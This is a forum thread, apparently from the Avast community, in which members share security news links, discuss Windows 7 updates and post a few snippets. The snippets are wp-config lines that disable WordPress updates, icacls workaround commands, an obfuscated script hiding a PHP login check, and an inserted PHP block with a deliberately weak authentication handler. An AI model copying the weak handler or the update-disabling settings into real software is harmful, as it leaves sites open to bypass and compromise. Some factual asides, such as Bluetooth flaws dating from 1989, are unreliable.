I just wonder what the answer would be :)
Just ask them and you'll see. ;D
It is a little like prodding a sleeping lion, or Snake :) excuse the pun.
I haven't got any Alexa stuff (and no intention of getting any), I have done as much as I can in Windows 10 to prevent Cortana, gathering data and likewise Google ;)
Deactivating Cortana was the first thing I did, for I wasn't able to stand Cortana's talking. ;D
-
<snip quotes>
Assuming I had them, the only question for Alexa, OK Google or Cortana would be 'How do I turn/switch you off.'
I just wonder what the answer would be :)
Just ask them and you'll see. ;D
It is a little like prodding a sleeping lion, or Snake :) excuse the pun.
I haven't got any Alexa stuff (and no intention of getting any), I have done as much as I can in Windows 10 to prevent Cortana, gathering data and likewise Google ;)
Deactivating Cortana was the first thing I did, for I wasn't able to stand Cortana's talking. ;D
You should have picked a different voice. These are things that vary from user to user.
I have no problems using Cortana or Google voice etc. Just set your own restrictions.
-
Microsoft unexpectedly drops Windows 7 support for some ancient CPUs
https://www.zdnet.com/article/microsoft-unexpectedly-drops-windows-7-support-for-some-ancient-cpus/
-
Unpatched security hole in WordPress CMS revealed:
https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
polonus
-
New Windows 10 vulnerability bypasses OS defenses, says security researcher
https://www.techrepublic.com/article/new-windows-10-vulnerability-bypasses-os-defenses-says-security-researcher/
-
Microsoft unexpectedly drops Windows 7 support for some ancient CPUs
https://www.zdnet.com/article/microsoft-unexpectedly-drops-windows-7-support-for-some-ancient-cpus/
Thanks, mchain, for that link. Now I know why I needed 4 W7 installations caused by important updates!!!
Shame on those, who do things like that!
-
@ =Snake=,
Consider yourself lucky to be able to run what amounts to a museum piece. :) I lost my Pentium III's a long time ago, PSU burnouts. Besides, nothing lasts anyway.
-
Microsoft ends support for Windows 7 and 8.1 on the Microsoft forums. Security update support for Windows 7 ends on Jan 14th 2020, while for Windows 8.1 one could reckon with updates until Jan 10th 2023, when it sounds likely that Microsoft might no longer exist by that time.
It is to be understood, that Microsoft and hardware firms will decide on what hardware and drivers are still available and what goes obsolete over time, as marketing strategies get more and more relentless all the time.
Probably our friend, =Snake=, has now landed in that respect between Scylla and Charybdis or as they say in the USA "between a rock and a hard stone". That for using the Windows platform for almost half a century :o
polonus
-
NSA deletes scores of call records over ‘technical irregularities’
http://thehill.com/policy/cybersecurity/394791-nsa-deletes-scores-of-call-records-over-technical-irregularities
-
Probably our friend, =Snake=, has now landed in that respect between Scylla and Charybdis or as they say in the USA "between a rock and a hard stone". That for using the Windows platform for almost half a century :o
Yes, indeed. Right now, I installed W7 the 6th time with only 9 updates including SP1.
BTW: DJBone helped to download and install the full version of 'W7 SP1 update pack 2.88
32bit' from WinFuture. Download and installation were ok, but until now, I couldn't find
the 273 updates from there!!!
::)
=Snake=
-
Probably our friend, =Snake=, has now landed in that respect between Scylla and Charybdis or as they say in the USA "between a rock and a hard stone". That for using the Windows platform for almost half a century :o
Yes, indeed. Right now, I installed W7 the 6th time with only 9 updates including SP1.
BTW: DJBone helped to download and install the full version of 'W7 SP1 update pack 2.88
32bit' from WinFuture. Download and installation were ok, but until now, I couldn't find
the 273 updates from there!!!
::)
=Snake=
I've a suspicion you can also find your 273 updates here: https://www.catalog.update.microsoft.com/Search.aspx?q=Windows%207
-
Probably our friend, =Snake=, has now landed in that respect between Scylla and Charybdis or as they say in the USA "between a rock and a hard stone". That for using the Windows platform for almost half a century :o
Yes, indeed. Right now, I installed W7 the 6th time with only 9 updates including SP1.
BTW: DJBone helped to download and install the full version of 'W7 SP1 update pack 2.88
32bit' from WinFuture. Download and installation were ok, but until now, I couldn't find
the 273 updates from there!!!
I've a suspicion you can also find your 273 updates here: https://www.catalog.update.microsoft.com/Search.aspx?q=Windows%207
Sorry, mchain, but I don't know how you mean it, for the 273 updates are already installed, but I don't see them in 'Installed Updates'! Why?
-
Using Microsoft Update Catalog is meant to be a manual way of updating your system(s). You'd be able to download each update you require and save each one for future use, should you ever have need of them again.
I think you are saying you already have the 273 updates installed but they are not showing in Win 7 Updates. Correct?
-
I think you are saying you already have the 273 updates installed but they are not showing in Win 7 Updates. Correct?
Yes.
-
Using Microsoft Update Catalog is meant to be a manual way of updating your system(s). You'd be able to download each update you require and save each one for future use, should you ever have need of them again.
I think you are saying you already have the 273 updates installed but they are not showing in Win 7 Updates. Correct?
I think you would be much better off doing this:
https://www.howtogeek.com/255540/the-last-windows-7-iso-youll-ever-need-how-to-slipstream-the-convenience-rollup/
-
I think you would be much better off doing this:
https://www.howtogeek.com/255540/the-last-windows-7-iso-youll-ever-need-how-to-slipstream-the-convenience-rollup/
Thanks, Bob, for the link, but I don't trust MS anymore. Who can tell, if there's everything ok with?
-
I think you would be much better off doing this:
https://www.howtogeek.com/255540/the-last-windows-7-iso-youll-ever-need-how-to-slipstream-the-convenience-rollup/
Thanks, Bob, for the link, but I don't trust MS anymore. Who can tell, if there's everything ok with?
If you don't trust MS, why are you using Windows ???
-
I think you would be much better off doing this:
https://www.howtogeek.com/255540/the-last-windows-7-iso-youll-ever-need-how-to-slipstream-the-convenience-rollup/
Thanks, Bob, for the link, but I don't trust MS anymore. Who can tell, if there's everything ok with?
If you don't trust MS, why are you using Windows ???
Now you're impolite. But (if you want) see my sig. :-X
-
I think you would be much better off doing this:
https://www.howtogeek.com/255540/the-last-windows-7-iso-youll-ever-need-how-to-slipstream-the-convenience-rollup/
Thanks, Bob, for the link, but I don't trust MS anymore. Who can tell, if there's everything ok with?
If you don't trust MS, why are you using Windows ???
Now you're impolite. But (if you want) see my sig. :-X
That's not un-polite. You made the comment that you don't trust Microsoft.
-
A persistent threat that cannot be underestimated by av and cybersecurity forces alike,
and should be analyzed, namely Nation State's APT Advanced Persistent Adware:
Read all about this here:
https://www.boozallen.com/s/insight/blog/advanced-persistent-adware.html
At the base of this is Advanced JavaScript-Based In-Memory Stage 1 Downloader (fully obfuscated).
From that story, additional code retrieved from the C2 server is advanced and, given its ability to execute arbitrary code, could be used as an implant for exfiltrating data and receiving further tasking outside of its adware capabilities.
Any adware provider could be hijacked for such nefarious state hackers' purposes.
The more reason for you all to run a third-party script blocker and an ad blocker alike.
I write this post to you in Cliqz with one private data point being removed on this very page where I am writing,
polonus (volunteer website security analyst and website error-hunter)
-
Internet Explorer from inadequate patch to fuller patch:
http://blogs.360.cn/blog/from-a-patched-itw-0day-to-remote-code-execution-part-i-from-patch-to-new-0day/
polonus
-
Vulnerability Note VU#304725 - Bluetooth implementations may not sufficiently validate elliptic curve parameters during Diffie-Hellman key exchange
https://www.kb.cert.org/vuls/id/304725
-
Scam alert! Don’t fall for this webcam extortion ploy
https://blog.avast.com/scam-alert-dont-fall-for-extortion-ploy
-
Scam alert! Don’t fall for this webcam extortion ploy
https://blog.avast.com/scam-alert-dont-fall-for-extortion-ploy
Ha, just like those that have been appearing in the forums. I just wonder if these hadn't initiated the blog article.
-
Vulnerability Note VU#304725 - Bluetooth implementations may not sufficiently validate elliptic curve parameters during Diffie-Hellman key exchange
https://www.kb.cert.org/vuls/id/304725
Bluetooth flaw allows man-in-the-middle attacks
https://blog.avast.com/bluetooth-security-flaw
-
Ha der Asyn,
This just after we had KRACK and BlueBorne on Android.
But there have been security problems since the introduction of the King Harald Bluetooth protocol, so since 1989.
Most vulnerable Bluetooth is at installing a new Bluetooth device during the so-called "pairing".
Read: https://www.makeuseof.com/tag/3-ways-bluetooth-device-security-risk/
Read: https://cs.stanford.edu/people/eroberts/courses/soco/projects/2003-04/wireless-computing/sec_bluetooth.shtml
For encryption glitches: http://colinoflynn.com/2016/11/philips-hue-aes-ccm-and-more/
S.G.
polonus
-
A malvertising campaign on thousands of WordPress websites:
https://research.checkpoint.com/malvertising-campaign-based-secrets-lies/
And again redirects to AdsTerra seem to be involved.
polonus
-
The Need for Managed Detection and Response: Persistent and Prevalent Threats in North America’s Security Landscape
https://blog.trendmicro.com/trendlabs-security-intelligence/the-need-for-managed-detection-and-response-persistent-and-prevalent-threats-in-north-americas-security-landscape/
-
The Need for Managed Detection and Response: Persistent and Prevalent Threats in North America’s Security Landscape
https://blog.trendmicro.com/trendlabs-security-intelligence/the-need-for-managed-detection-and-response-persistent-and-prevalent-threats-in-north-americas-security-landscape/
The difference between this report from Trend Micro and the one from Avast is the product recommended to protect you from this dangerous landscape.
I prefer the software recommended by Avast. :)
-
A malvertising campaign on thousands of WordPress websites:
https://research.checkpoint.com/malvertising-campaign-based-secrets-lies/
And again redirects to AdsTerra seem to be involved.
polonus
Malvertising in plain sight
https://blog.avast.com/malvertising-in-plain-sight
-
[Reddit] - We had a security incident. Here's what you need to know.
https://www.reddit.com/r/announcements/comments/93qnm5/we_had_a_security_incident_heres_what_you_need_to/
-
Hi Asyn,
Various ways the cybercriminals could have hacked their criminal way in:
1. https://motherboard.vice.com/en_us/article/a3q7mz/hacker-allegedly-stole-millions-bitcoin-sim-swapping
2. https://motherboard.vice.com/en_us/article/j5bpg7/sim-hijacking-t-mobile-stories
Weaknesses of SS7: 3. https://secure-voice.com/ss7_attacks/
2nd-factor authentication could be protocol-dependent: 4. https://pages.nist.gov/800-63-3/sp800-63b.html#out-of-band
Krebs also wrote on it: 5. https://krebsonsecurity.com/2018/08/reddit-breach-highlights-limits-of-sms-based-authentication/
Way to perform this: 6. https://www.theguardian.com/technology/2016/apr/19/ss7-hack-explained-mobile-phone-vulnerability-snooping-texts-calls
It is a question of malware installed on the device, or of the fact that many firms send out SMS through an external party, which delivers it again to a mobile network. The connection to that external 3rd party could be more simply hacked than the protocol itself (through technology and also via an inside job, for instance). Reddit will now use two-factor token authentication, because once bitten means now twice shy. ::) :o
polonus
-
Still too many (big) websites fall victim to this threat, SQL injection:
https://codecurmudgeon.com/wp/sql-injection-hall-of-shame/
Examples from the main PHP-based CMS software, WordPress & Drupal - update to the most recent versions.
Latest vulnerability caused WP and Drupal to update:
https://symfony.com/blog/cve-2018-14773-remove-support-for-legacy-and-risky-http-headers
Re: https://framework.zend.com/security/advisory/ZF2018-01
For those unwise ones who know such CMS to be insecure by design
and still do not wanna update automatically, put this inside your wp-config.php ;) ::)
// Disable all automatic updates
define( 'AUTOMATIC_UPDATER_DISABLED', true );
define( 'WP_AUTO_UPDATE_CORE', false );
define( 'DISALLOW_FILE_MODS', true );
define( 'DISALLOW_FILE_EDIT', true );
:o
polonus (volunteer website security analyst and website error-hunter)
-
HPSBHF03589 rev. 2 - HP Ink Printers Remote Code Execution
https://support.hp.com/us-en/document/c06097712
-
Instagram has been #hacked
https://blog.avast.com/hackers-attack-instagram
-
23 security extensions removed from Firefox: https://blocked.cdn.mozilla.net/96b2e7d5-d4e4-425e-b275-086dc7ccd6ad.html
The extensions were Web Security and, from the same group of developers, Browser Security, Browser Privacy and Browser Safety, also YouTube MP3 Converter, Dirty Little Helpers & Video Downloader.
The extensions were blocked because they could send certain browser user data to remote servers, and remote code could also be executed inside the browser.
polonus
-
Impact of the so-called Foreshadow flaw inside Intel processors.
What was not discussed is the impact of the Foreshadow bug for future developments in cryptocurrency:
https://www.coindesk.com/what-intels-foreshadow-flaw-means-for-the-future-of-cryptocurrency/
Moxie Marlinspike's MobileCoin project, with SGX in a prominent role, now should be postponed for the time being.
That is a bad thing for an initiative that tries to create a more eco-friendly alternative to gigantic energy-consuming "mining". SGX as a new way of safeguarding private keys is now put on hold for a while.
It is a good thing a fix for that particular flaw was ready by Intel a few months before the flaw was openly disclosed, but as the mitigations and patches are slow to be implemented overall, we will still be confronted with a vulnerable infrastructure for quite some time.
"Trusted hardware". We have to wait a while before we can talk about real "trusted hardware" again.
Root causes for such problems are big commerce with almost murderous processor competition.
polonus
-
Gaping Ghostscript hole lets attackers perform commands remotely!
Re: http://openwall.com/lists/oss-security/2018/08/21/2
Read: https://www.kb.cert.org/vuls/id/332928
polonus
-
Internet Explorer (IE) vulnerability > CVE-2018-8373
https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/
" Internet Explorer 11 is not vulnerable since VBScript in Windows 10 Redstone 3 (RS3) has been effectively disabled by default."
-
Australia bans China's Huawei from 5G mobile network, angers Beijing
https://www.reuters.com/article/us-australia-china-huawei-tech/australia-bans-chinas-huawei-from-5g-mobile-network-angers-beijing-idUSKCN1L72GC
-
Mirai malware has now also come to Android systems thanks to Aboriginal Linux:
https://www.symantec.com/blogs/threat-intelligence/mirai-cross-platform-infection
Such is the ease of broad cross-platform compilation of malware.
Not only a comfort for developers, but also for the sneaky cyber-malcreant.
All can be tested under QEMU, so also a real testbed for the cyber-criminal.
Project: https://github.com/landley/aboriginal
Easy peasy Mirai everywhere.
polonus
-
On JavaScript projects with a 1 in 2 vulnerability score:
https://www.theregister.co.uk/2018/08/22/npm_vulnerability_scanner/
Probably known from all I report via volunteer website security scanning, the retirable jQuery code detected (also via Snyk)
and the JavaScript unpacker error reports I file there quite regularly.
JavaScript never became really secure since it first came out in the previous century.
Block it using a combination of uMatrix and uBlock Origin or any other 3rd-party script blocker (NoScript etc.).
polonus
-
Gaping Ghostscript hole lets attackers perform commands remotely!
Re: http://openwall.com/lists/oss-security/2018/08/21/2
Read: https://www.kb.cert.org/vuls/id/332928
-> https://bugs.chromium.org/p/project-zero/issues/detail?id=1640
-
Security updates available for Adobe Photoshop CC | APSB18-28
https://helpx.adobe.com/security/products/photoshop/apsb18-28.html
-
New gaping zero-day hole in Windows 10
Read: https://www.kb.cert.org/vuls/id/906424
Wait for the patch scheduled for the next patch round.
Workaround for the time being: as the implementation is open source, one can block this leak with:
icacls c:\windows\tasks /remove:g "Authenticated Users"
icacls c:\windows\tasks /deny system:(OI)(CI)(WD,WDAC)
Warning: this will block SYSTEM's rights to write to your tasks folder and removes authenticated users' rights in the tasks folder. This could possibly affect the functioning of scheduled tasks. In a short test everything still worked fine.
Info credits for this temp. fix go to Tweaker.net's Karsten88
polonus
-
PHP-based content management software like Magento, WordPress etc. is a continuous risk to use on websites.
Not everybody will fully patch, update, upgrade or configure it properly, putting not only themselves but also others at risk.
"PEBKAC" mainly.
MagentoCore skimmer malware threatens many Magento webshops:
Approx. 7300 webshops hacked so far!
Read:
https://gwillem.gitlab.io/2018/08/30/magentocore.net_skimmer_most_aggressive_to_date/
Also here: https://twitter.com/gwillem/status/1035119660277096448
So scan your shop's CMS at https://www.magereport.com/
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
390.000 websites vulnerable world-wide according to the Vladimir Smitka scan:
https://lynt.cz/blog/global-scan-exposed-git
Hand your website code to a hacker and he/she can get at sensitive data of all sorts,
or what is secure code to-day may be vulnerable and hackable code to-morrow.
polonus
-
Five Eyes’ Nations Quietly Demand Government Access to Encrypted Data
https://www.nytimes.com/2018/09/04/us/politics/government-access-encrypted-data.html
https://www.homeaffairs.gov.au/about/national-security/five-country-ministerial-2018/access-evidence-encryption
-
Theft of Customer Data at British Airways
http://www.iairgroup.com/phoenix.zhtml?c=240949&p=irol-newsArticle_Print&ID=2366426
https://www.britishairways.com/en-gb/information/incident/data-theft/latest-information
-
Theft of Customer Data at British Airways
http://www.iairgroup.com/phoenix.zhtml?c=240949&p=irol-newsArticle_Print&ID=2366426
https://www.britishairways.com/en-gb/information/incident/data-theft/latest-information
A lot in the papers and the news in the UK about this today. They are already talking about financial penalties, something like a few million or 4% of turnover, whichever is higher, and that could be as much as a few £billion.
Now the question would be: where does this financial penalty go?
I rather doubt it would go towards any fraudulent use of those customers' card information, etc. They may well be able to try and get recovery from the banks for fraudulent use, but why should the banks be held liable or responsible?
-
7 Big Ways Online Rights Have Changed This Year
https://blog.mozilla.org/internetcitizen/2018/06/25/changes-to-online-rights/?utm_source=desktop-snippet&utm_medium=snippet&utm_campaign=OnlineRights&utm_term=9193&utm_content=REL&sample_rate=0.001&snippet_name=9193
-
Phishing scam targets WordPress users
https://blog.avast.com/phishing-scam-targets-wordpress-users
-
Theft of Customer Data at British Airways
http://www.iairgroup.com/phoenix.zhtml?c=240949&p=irol-newsArticle_Print&ID=2366426
https://www.britishairways.com/en-gb/information/incident/data-theft/latest-information
A lot in the papers and the news in the UK about this today. They are already talking about financial penalties, something like a few million or 4% of turnover, whichever is higher, and that could be as much as a few £billion.
Now the question would be: where does this financial penalty go?
I rather doubt it would go towards any fraudulent use of those customers' card information, etc. They may well be able to try and get recovery from the banks for fraudulent use, but why should the banks be held liable or responsible?
380K British Airways transactions compromised in data breach
https://blog.avast.com/british-airways-hack-similar-to-ticketmaster-breach
-
Theft of Customer Data at British Airways
http://www.iairgroup.com/phoenix.zhtml?c=240949&p=irol-newsArticle_Print&ID=2366426
https://www.britishairways.com/en-gb/information/incident/data-theft/latest-information
A lot in the papers and the news in the UK about this today. They are already talking about financial penalties, something like a few million or 4% of turnover, whichever is higher, and that could be as much as a few £billion.
Now the question would be: where does this financial penalty go?
I rather doubt it would go towards any fraudulent use of those customers' card information, etc. They may well be able to try and get recovery from the banks for fraudulent use, but why should the banks be held liable or responsible?
380K British Airways transactions compromised in data breach
https://blog.avast.com/british-airways-hack-similar-to-ticketmaster-breach
Very interesting and scary article.
-
Security flaw in ‘nearly all’ modern PCs and Macs exposes encrypted data
https://techcrunch.com/2018/09/12/security-flaw-in-nearly-all-modern-pcs-and-macs-leaks-encrypted-data/?guccounter=1
The Chilling Reality of Cold Boot Attacks >> https://blog.f-secure.com/cold-boot-attacks/
-
Attack Landscape of 2018, So Far
https://blog.f-secure.com/attack-landscape-2018-far/
-
L.S.
Content injection vulnerability via install.php in the outdated Duplicator WordPress plug-in:
Read https://blog.sucuri.net/2018/09/outdated-duplicator-plugin-rce-abused.html
Weakness: https://github.com/vichan-devel/vichan/issues/284
WordPress vuln.: https://secure.wphackedhelp.com/blog/wordpress-vulnerabilities-how-to-fix-guide-tools/
The wp-config.php file should be checked or reinstalled when overwritten through this plug-in hole.
PHP weaknesses and bad WordPress configuration will facilitate such attacks.
Still loads of WP websites with user enumeration enabled and directory listing enabled.
The PHP-based WordPress CMS is not for the ill-instructed or n00bs; learn to configure it properly and securely.
polonus (volunteer website security analyst and website error-hunter)
-
Peekaboo! They can see you!
https://blog.avast.com/nuuo-peekaboo-vulnerability-gives-hackers-your-camera-feed
-
Adguard attacked
https://adguard.com/en/blog/adguard-security-notice/
-
WordPress sites hacked to facilitate help-desk fraud:
https://blog.malwarebytes.com/threat-analysis/2018/09/mass-wordpress-compromises-tech-support-scams/
Scan: https://hackertarget.com/wordpress-security-scan/ and here: https://webhint.io/
Over 78% of PHP installs are insecure. WordPress, Drupal, Joomla and Magento are PHP-based CMS.
WordPress is a CMS that comes without internal encryption, which makes it more insecure.
Read: https://developers.slashdot.org/story/14/12/31/002253/over-78-of-all-php-installs-are-insecure
Also: https://paragonie.com/blog/2017/12/2018-guide-building-secure-php-software
and https://paragonie.com/blog/2016/08/on-insecurity-popular-open-source-php-cms-platforms
polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
-
Magecart claims another victim in Newegg merchant data theft
https://www.zdnet.com/article/magecart-claims-another-victim-in-newegg-merchant-data-theft/
-
A Big Change in Chrome 69 can put you at risk
https://www.komando.com/happening-now/486524/a-big-change-in-chrome-69-can-put-you-at-risk
To view/read relevant information, see topic listed below:
Big change in Chrome's address bar
Follow instructions on how to disable Default settings for chrome://flags/#omnibox-ui-hide-steady-state-url-scheme-and-subdomains
Apparently Avast Secure Browser 69.0 is affected as well.
[EDIT:] ASB may or may not be affected.
-
A Big Change in Chrome 69 can put you at risk
https://www.komando.com/happening-now/486524/a-big-change-in-chrome-69-can-put-you-at-risk
To view/read relevant information, see topic listed below:
Big change in Chrome's address bar
Follow instructions on how to disable Default settings for chrome://flags/#omnibox-ui-hide-steady-state-url-scheme-and-subdomains
Apparently Avast Secure Browser 69.0 is affected as well.
[EDIT:] ASB may or may not be affected.
I personally have also applied that recommended change in the Avast Secure Browser.
Better safe than sorry. :)
-
Facebook Vulnerability Affecting 50 Million Users Allowed Account Takeover
https://www.bleepingcomputer.com/news/security/facebook-vulnerability-affecting-50-million-users-allowed-account-takeover/
https://newsroom.fb.com/news/2018/09/security-update/
-
Facebook Vulnerability Affecting 50 Million Users Allowed Account Takeover
https://www.bleepingcomputer.com/news/security/facebook-vulnerability-affecting-50-million-users-allowed-account-takeover/
https://newsroom.fb.com/news/2018/09/security-update/
Facebook security breach - what should you do?
https://blog.avast.com/facebook-security-breach-what-should-you-do
-
Popular CMS will still accept older PHP versions. To-day Drupal will run with PHP 5.5.9. Joomla demands at least PHP 5.3 and WordPress still will accept PHP 5.2.4.
Always be aware of PHP vulnerabilities like this authentication bypass - http://yaisb.blogspot.com/2006/08/authentication-bypass_07.html * - which could reappear encrypted:
<script> <!-- document.write(unescape("%3C%3F%0A%0Aif%28%21isset%28%24_SESSION%5B%27session%27%5D%5B%22privLvl%22%5D%29%29%20%7B%20%0A%20header%28%22Location%3A%20login.php%22%29%3B%0A%20exit%28%29%3B%0A%7D%0A%0Aecho%20%22BIG%20SECRET%21%22%3B%0A%0A%3F%3E")); //--> </script>
translating to:
<?
if(!isset($_SESSION['session']["privLvl"])) {
 header("Location: login.php");
 exit();
}
echo "BIG SECRET!";
?>
code source credits go to: RYAN *
polonus
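The decoded check above, as an added example (my code, not the poster's or the linked blog's): the same session test rebuilt as two request handlers, the weak one falling through after the redirect header and the hardened one terminating and requiring a minimum privilege level. It assumes the session array and emitted headers are passed around explicitly so it runs from the PHP CLI without a web server.

```php
<?php
declare(strict_types=1);

// Added example, not code from the original post. The Response class, the two
// handlers and the session fixtures below are constructed for illustration.
final class Response
{
    public int $status;
    /** @var string[] */
    public array $headers;
    public string $body;

    public function __construct(int $status, array $headers, string $body)
    {
        $this->status = $status;
        $this->headers = $headers;
        $this->body = $body;
    }
}

// Weak variant: the redirect header is queued, but nothing stops the script,
// so the protected output is still appended to the response. A client that
// simply does not follow the Location header reads the body anyway.
function handleWeak(array $session): Response
{
    $headers = [];
    $body = '';
    if (!isset($session['session']['privLvl'])) {
        $headers[] = 'Location: login.php';
        // no exit() here: execution falls through to the protected content
    }
    $body .= 'BIG SECRET!';
    return new Response($headers ? 302 : 200, $headers, $body);
}

// Hardened variant: the redirect terminates processing (the early return plays
// the role of exit() in a real page), and the privilege level is compared with a
// required minimum instead of only testing that the key exists, so a stale or
// zero-valued privLvl does not pass either.
function handleHardened(array $session, int $required = 1): Response
{
    $priv = $session['session']['privLvl'] ?? null;
    if (!is_int($priv) || $priv < $required) {
        return new Response(302, ['Location: login.php'], '');
    }
    return new Response(200, [], 'BIG SECRET!');
}

// Constructed sessions: anonymous, a user with privLvl present but 0, a real user.
$cases = [
    'anonymous' => [],
    'privLvl=0' => ['session' => ['privLvl' => 0]],
    'privLvl=1' => ['session' => ['privLvl' => 1]],
];

foreach ($cases as $label => $session) {
    foreach (['handleWeak', 'handleHardened'] as $handler) {
        $r = $handler($session);
        printf(
            "%-9s %-14s status=%d headers=[%s] body=%s\n",
            $label,
            $handler,
            $r->status,
            implode(', ', $r->headers),
            var_export($r->body, true)
        );
    }
}
```

Run with `php` on the CLI: the weak handler returns the secret body for the anonymous session despite the 302 and Location header, and accepts privLvl=0 because isset() is true for 0; the hardened handler returns an empty body in both of those cases.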
-
Kraken Cryptor Ransomware Connecting to BleepingComputer During Encryption
https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-connecting-to-bleepingcomputer-during-encryption/
-
Remote Code Execution Flaws Found in Popular OS Powering Embedded Systems
https://www.bleepingcomputer.com/news/security/remote-code-execution-flaws-found-in-popular-os-powering-embedded-systems/
-
Every time I create a web account I create a new email address which is forwarded to my real email address. I never use that email address for anything else. That way, if I get emails to that address that I should not, I know the site is marketing my address or that they have been hacked.
I just received an email from a hacker warning of dire consequences if I don't pay big time. (I know it is not true but just a scam.) However, the scam email was sent to an email address which has never been used for anything except to log on to this site. I have not used it for several years (until the scammer used it today). My domain is one they would not likely try (it's something like ky7620z.com). It is not very comforting that an antimalware site has been hacked like that.
I have deleted the forwarder so the email address no longer exists. Avast needs to be more careful to protect its customers.
-
Every time I create a web account I create a new email address which is forwarded to my real email address. I never use that email address for anything else. That way, if I get emails to that address that I should not, I know the site is marketing my address or that they have been hacked.
I just received an email from a hacker warning of dire consequences if I don't pay big time. (I know it is not true but just a scam.) However, the scam email was sent to an email address which has never been used for anything except to log on to this site. I have not used it for several years (until the scammer used it today). My domain is one they would not likely try (it's something like ky7620z.com). It is not very comforting that an antimalware site has been hacked like that.
I have deleted the forwarder so the email address no longer exists. Avast needs to be more careful to protect its customers.
Avast wasn't hacked. This forum was some years back - https://www.grahamcluley.com/avast-forum-hacked/
-
Every time I create a web account I create a new email address which is forwarded to my real email address. I never use that email address for anything else. That way, if I get emails to that address that I should not, I know the site is marketing my address or that they have been hacked.
I just received an email from a hacker warning of dire consequences if I don't pay big time. (I know it is not true but just a scam.) However, the scam email was sent to an email address which has never been used for anything except to log on to this site. I have not used it for several years (until the scammer used it today). My domain is one they would not likely try (it's something like ky7620z.com). It is not very comforting that an antimalware site has been hacked like that.
I have deleted the forwarder so the email address no longer exists. Avast needs to be more careful to protect its customers.
The email scam you're describing sounds like the one that did the rounds not long ago: some guy reckons he's recorded you watching porn and has collected all your contacts, and if you don't pay the ransom he'll forward the video to all your friends, yada yada yada ::) I also got the same scam email, to an old email used for this forum 4 years ago. Avast did change their registration process after that hack to further prevent it happening again.
Unfortunately these forum hacks are happening more and more often; Malwarebytes was struck somewhere back around the same time as Avast, Adguard was hit only a few weeks ago also, and just about all emails were pwned.
It's crazy how many Government offices and other businesses have been hit recently, sadly it's only going to get worse :(
-
Check your email here https://haveibeenpwned.com
-
BA website hijacked by Magecart. Again.
https://blog.avast.com/ba-website-hijacked-by-magecart-again
-
Flaws in self-encrypting SSDs let attackers bypass disk encryption
https://www.zdnet.com/article/flaws-in-self-encrypting-ssds-let-attackers-bypass-disk-encryption/
-
Strange snafu misroutes domestic US Internet traffic through China Telecom
https://arstechnica.com/information-technology/2018/11/strange-snafu-misroutes-domestic-us-internet-traffic-through-china-telecom/
-
Data storage devices from Samsung and others leave customers at risk
https://blog.avast.com/security-flaws-found-in-widely-used-data-storage-devices-avast
-
WordPress Design Flaw + WooCommerce Vulnerability Leads to Site Takeover
https://www.bleepingcomputer.com/news/security/wordpress-design-flaw-woocommerce-vulnerability-leads-to-site-takeover/
-
WordPress sites hacked via hole in GDPR-plug-in:
https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-gdpr-compliance-plugin-exploited-in-the-wild/
Abuse reported: https://www.reddit.com/r/Wordpress/comments/9vbtdb/slew_of_user_registrations_and_privilege/
Other abuse: https://www.wordfence.com/blog/2018/11/trends-following-vulnerability-in-wp-gdpr-compliance-plugin/
polonus
N.B. On a specific abuser: https://raidboxes.at/sicherheitsluecke-dsgvo-plugin-wordpress/
Read the analysis of this hack by Word Press user t2trollherten via a Russian IP address:
https://wordpress.stackexchange.com/questions/318755/understanding-website-hack
Damian
-
Another ongoing WordPress malware campaign is via saks.made dot net:
Read: https://blog.sucuri.net/2018/10/saskmade-net-redirects.html
and http://dfir.pro/index.php?link_id=90047
and see: https://github.com/Hestat/lw-yara/blob/master/includes/saskmade-net-redirects.yar
polonus
-
This is disturbing.
Google Services Disrupted as Internet Traffic Diverts to China (https://www.pcmag.com/news/364922/google-services-disrupted-as-internet-traffic-diverts-to-chi?utm_source=email&utm_campaign=whatsnewnow&utm_medium=title)
Another reason why your VPN (https://www.avast.com/secureline-vpn#pc) should always be in use.
-
Security risk on AMP for WP – Accelerated Mobile Pages Plugin
https://www.webarxsecurity.com/amp-plugin-vulnerability/
-
Researchers Created Fake 'Master' Fingerprints to Unlock Smartphones
https://motherboard.vice.com/en_us/article/bjenyd/researchers-created-fake-master-fingerprints-to-unlock-smartphones
-
Security updates available for Flash Player | APSB18-44
https://helpx.adobe.com/security/products/flash-player/apsb18-44.html
-
Tackle the ever-existing threat of the gaping UPnP hole - disable that service! ::)
1,7 million devices are at risk: https://blogs.akamai.com/sitr/2018/11/upnproxy-eternalsilence.html
Test: https://www.snbforums.com/threads/new-upnp-exploit-affecting-most-asus-routers-upnproxy-blackhat-proxies-via-nat-injections.46011/page-2#post-400981
The Server header for a normal response could be "Microsoft-IIS/8.5",
while the header for a response during an attack would be "Microsoft-HTTPAPI/2.0";
then pay attention to whether (SSDP/UPnP) is present.
The ironic thing, however, is that with newer versions of the UPnP protocol we find minimal core security protection.
UPnP attacks can be used to cause chaos, to create holes in firewalls, and for other abuse.
UPnP: deadly simple, or simply deadly to leave open on your machines, so disable it where you can.
polonus
-
Marriott Announces Starwood Guest Reservation Database Security Incident
http://news.marriott.com/2018/11/marriott-announces-starwood-guest-reservation-database-security-incident/
-
Security updates available for Flash Player | APSB18-42
https://helpx.adobe.com/security/products/flash-player/apsb18-42.html
-
ASUS, GIGABYTE Drivers Contain Code Execution Vulnerabilities - PoCs Galore
https://www.bleepingcomputer.com/news/security/asus-gigabyte-drivers-contain-code-execution-vulnerabilities-pocs-galore/
-
Microsoft Releases Out-of-Band Security Update for Internet Explorer RCE Zero-Day
https://www.bleepingcomputer.com/news/security/microsoft-releases-out-of-band-security-update-for-internet-explorer-rce-zero-day/
-
Security Bulletin for Adobe Acrobat and Reader | APSB19-02
https://helpx.adobe.com/security/products/acrobat/apsb19-02.html
-
The latest technology is not always rock-solidly safe and secure:
massive security breaches or thefts involving blockchains.
Read: https://magoo.github.io/Blockchain-Graveyard/
Security through obscurity demanding its toll:
massive security breaches or thefts involving blockchains (info credits go to FTREPORTER).
polonus
-
A lot of malware lurks in google searches, some even have the brass neck to pay for search placement on specific search words/terms or have sponsored links. Google really need to be more proactive in rooting out the possibly malicious/fraudulent sponsored links or search placement.
That's the reason (for me) for not using google search.
-
